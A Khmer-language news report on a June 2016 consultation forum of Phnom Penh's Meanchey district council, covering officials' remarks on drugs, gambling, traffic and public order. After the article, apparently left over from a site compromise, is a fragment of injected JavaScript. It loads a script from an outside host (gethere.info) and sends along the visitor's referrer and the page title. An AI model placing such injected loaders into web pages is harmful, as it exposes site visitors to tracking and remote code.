វេទិកាផ្សព្វផ្សាយ និងពិគ្រោះយោបល់របស់ក្រុមប្រឹក្សារខណ្ឌមានជ័យ អាណត្តិទី២ ក្រោមអធិតិភាព លោក អែម សុខលាង

ភ្នំពេញ៖ នៅព្រឹកថ្ងៃទី២៣ ខែមិថុនា ឆ្នាំ២០១៦ នៅក្នុងនៅភោជ្ជនីដ្ឋានមង្គលឩត្តម ផ្លូវ៣៧១សង្កាត់បឹង ទំពន់ ខណ្ឌមានជ័យ រាជធានីភ្នំពេញបានរៀបចំវេទិកាផ្សព្វផ្សាយ និងពិគ្រោះយោបល់របស់ក្រុមប្រឹក្សា ខណ្ឌមានជ័យអាណត្តិទី២។

 
វេទិកាផ្សព្វផ្សាយ និងពិគ្រោះយោបល់របស់ក្រុមប្រឹក្សាខណ្ឌមានជ័យ មានការអញ្ជើចូលរួមពី អែម សុខលាង ប្រធានក្រុមប្រឹក្សារខណ្ឌ លោក ពេជ្រ កែវ មុនី អភិបាលរងនៃគណៈអភិបាលខណ្ឌមានជ័យ លោក ឌី រ័ត្នខេមរុណ អភិបាលរងខណ្ឌ សមាជិក សមាជិកា ថ្នាក់ដឹកនាំសង្កាត់ និងមន្ត្រីរាជការជុំវិញសាលាខណ្ឌជាច្រើននាក់ទៀត។

 

ជាកិច្ចបេីកកម្មវិធី លោក អែម សុខលាងបាន មានមតិសំណេះសំណាល ជាមួយជាមួយអង្គពិធីទាំងមូល និងបានប្រកាសអោយបេីកវេទិកាផ្សព្វផ្សាយ និងពិគ្រោះយោបល់ចាប់ដំណេីរការ។

 

លោក ឌី រ័ត្នខេមរុណ បានឡេីងអានរបាយការណ៍ សំណេីរ សំណួរ សំណូមពរ ឆ្លេីយក្នុងវេទិការក្នុងឆ្នាំចាស់ (២០១៥) ។
ឆ្លងតាមរបាយការណ៍រួម វេទិកាថ្ងៃនេះ គឺមានគោលបំណង ផ្សព្វផ្សាយពីសមិទ្ធផលនានាដែលសម្រេចបានរបស់ក្រុមប្រឹក្សាខណ្ឌ និងការពិគ្រោះយោបល់ អំពីបញ្ហាផ្សេងៗ ក្តីកង្វល់ និងតម្រូវការអាទិភាព របស់ប្រជាពលរដ្ឋនៅតាម មូលដ្ឋានក្នុងនោះរួមមាន៖ សណ្តាប់ធ្នាប់សាធារណៈ សោភ័ណ្ឌភាព និងអាណាម័យបរិស្ថាននៅក្នុង ទីក្រុង ទីប្រជុំជន និងផ្តល់សេវាសាធារណៈ ការលើកផែនការគម្រោងអភិវឌ្ឍន៍ហេដ្ឋារចនាសម្ព័ន្ធក្នុងមូលដ្ឋាន នានា ជាពិសេសទទួលយកនូវចម្ងល់ សំណួរផ្សេងៗ ពីប្រជាពលរដ្ឋ ដើម្បីអាជ្ញាធរមូលដ្ឋានដោះស្រាយ ជូនប្រជាពលរដ្ឋឲ្យបានទាន់ពេលវេលា។

 
លោកពេជ្រ កែវមុនី មានប្រសាសន៍ថា៖ អាជ្ញាធរភូមិ សង្កាត់ ខណ្ឌ ពិសេសកំលាំងកងរាជអាវុធហត្ថ និង កងកំលាំងនគរបាល ត្រូវរួមគ្នាដោះស្រាយបញ្ហា មិនត្រូវឃុបឃិតជាមួយអ្នកប្រើប្រាស់ និងចែកចាយគ្រឿងញៀន និងល្បែងស៊ីសង គ្រប់ប្រភេទ ហើយត្រូវទប់ស្កាត់ឲ្យបានទាន់ពេលវេលា និងមានប្រសិទ្ធភាពខ្ពស់។ បញ្ហាចរាចរណ៍ បញ្ហាចោរឆក ចោរលួច បញ្ហាអ្នកលក់ដូរលើផ្លូវសាធារណៈជាហេតុធ្វើឲ្យកកស្ទះ និងគ្រោះថ្នាក់ចរាចរណ៍ មន្ទីរ អង្គភាពពាក់ព័ន្ធ ត្រូវអនុវត្តឲ្យបានទៅតាមស្មារតីអង្គវេទិកា ដែលបានលើកឡើងនាថ្ងៃនេះ៕

imageimageimage

image image image image image  image image image image images.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More